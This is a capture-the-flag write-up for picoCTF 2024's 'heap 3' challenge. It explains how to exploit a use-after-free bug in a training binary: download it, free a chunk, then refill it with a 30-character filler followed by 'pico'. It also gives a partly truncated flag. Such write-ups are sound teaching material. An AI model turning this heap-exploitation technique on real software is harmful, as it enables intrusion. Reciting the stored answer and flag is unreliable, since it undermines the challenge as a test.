picoCTF Solutions
picoCTF 2024Binary ExploitationMedium

heap 3

Published: April 3, 2024Updated: December 9, 2025

Description

This program mishandles memory. Can you exploit it to get the flag?

Setup

Local + remote

Download chall and chall.c for local analysis.

Connect to tethys.picoctf.net <PORT_FROM_INSTANCE> to interact with the menu.

wget https://artifacts.picoctf.net/c_tethys/6/chall && \ chmod +x chall && \ wget https://artifacts.picoctf.net/c_tethys/6/chall.c && \ nc tethys.picoctf.net <PORT_FROM_INSTANCE>

Solution

This is the final heap challenge in the series. After progressing through heap 0 (basic overflow), heap 1 (specific value), and heap 2 (function pointers), you now exploit use-after-free vulnerabilities. The menu offers: 2. Allocate heap object (controlled length). 3. Print current x value. 4. Check for win (requires x == "pico"). 5. Free x (this sets up the use-after-free).
  1. Step 1Free the chunk first
    Option 5 must run before anything else so the program continues to use a dangling pointer to x.
  2. Step 2Allocate with controlled data
    Option 2 asks for a length. Enter 31 so you can write 30 filler characters followed by pico, which overwrites the freed structure.
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAApico
  3. Step 3Verify and print
    Option 3 now echoes pico, and option 4 prints the flag because the dangling pointer points to your crafted data.
    If the check fails, ensure you freed first and used exactly 30 filler characters before pico.

Flag

picoCTF{now_thats_free_real_estate_a11...}

Once the freed chunk is reallocated with pico, the win check passes and prints the flag.